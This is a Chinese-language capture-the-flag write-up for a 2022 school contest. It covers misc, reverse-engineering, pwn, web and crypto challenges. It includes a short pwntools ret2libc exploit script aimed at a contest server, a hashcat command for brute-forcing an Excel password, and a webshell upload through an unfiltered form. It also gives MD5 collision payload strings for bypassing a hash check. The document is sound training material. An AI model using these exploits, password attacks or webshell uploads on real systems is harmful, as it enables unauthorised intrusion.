QLNU2022-4-24校赛WP

警告
本文最后更新于 2023-01-29,文中内容可能已过时。

校赛WP

[TOC]

这是比赛中交了flag的部分 后来做出来的部分等写完再发

misc

问卷

填写问卷

不会有人没看过猫和老鼠吧

直接看视频

我觉得拆成图片比较容易看

使用ffmpeg视频转图片的教程在我的这篇博客有写*(推销)*

http://blog.shenghuo2.top/index.php/archives/114/

image-20220425182133975

image-20220425182153334

image-20220425182215480

image-20220425182223442

image-20220425182231176

image-20220425182238733

QLNU{比赛快樂!}

海伦·凯勒

这题很明显 双图盲水印

项目地址:https://github.com/chishaxie/BlindWaterMark/

主要是没发现有python3脚本 我用python2的脚本跑完出不来就放弃了

直到位大爹做出来 我才有了解题的希望 重新试了试python3的脚本

image-20220425183320492

这个图属实是折磨人了

1
j43kn8ty6ad3u0ecv

flag在哪呢

hint:hashcat爆破excel密码 密码是八位数字

上了提示之后 直接拿出来的库存的hashcat和我8位数字的密码字典开始跑

hashcat的介绍与使用 我在博客也写过()

http://blog.shenghuo2.top/index.php/archives/24/

hashcat爆破excel 参照吾爱论坛

https://www.52pojie.cn/thread-1578758-1-1.html

1
hashashcat -a 0 -m 9500 excel.hash ?d?d?d?d?d?d?d?d

我用3060大概跑了十分钟不到

密码04131006

image-20220425185100735

打开是一个超大的二维码

改行高列宽就行

image-20220425185337496

扫出来是一个链接

image-20220425185452544

打开看不到flag 尝试用binwalk分离

image-20220425185531383

image-20220425185558479

flag在图片详细信息里

QLNU{FlogisHerehahaha}

RE

babyre

upx 脱壳机脱掉

image-20220425193606813

看字符串 一眼base换表

image-20220425193743057

image-20220425193902464

cyberchef一把梭 然后ceaser穷举

image-20220425194005552

这个长得像句子 就他了

QLNU{Believeinyourself}

pwn

signin

就是个ret2libc 没什么好说的

直接打

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
from pwn import *
# p = process('./signin')
p = remote('101.43.85.204',20189)

system_addr = 0x080490E0
binsh = 0x0804a054

payload = b'a'*76 + p32(system_addr) + p32(0) + p32(binsh)

p.sendline(payload)
p.interactive()

web

upload

第一页是假的 查看源码 进入/real_upload.php

连过滤都没有

image-20220425194737956

直接传上去 蚁剑连上就行

flag在根目录image-20220425194816316

嘉心糖的试炼

image-20220425195052806

b站关注嘉然今天吃什么

用dirsearch扫目录

image-20220425195247129

有bak文件 下载得到账号密码

跳转到下一关

image-20220425195420552

md5强碰撞 网上一搜就有payload 直接用就行

1
2
?qlnu=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&xino=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

crypto

路易十三

真没啥好说的 就rot13

QLNU{ZhuDaJiaBiSaiYuKuai~}

0%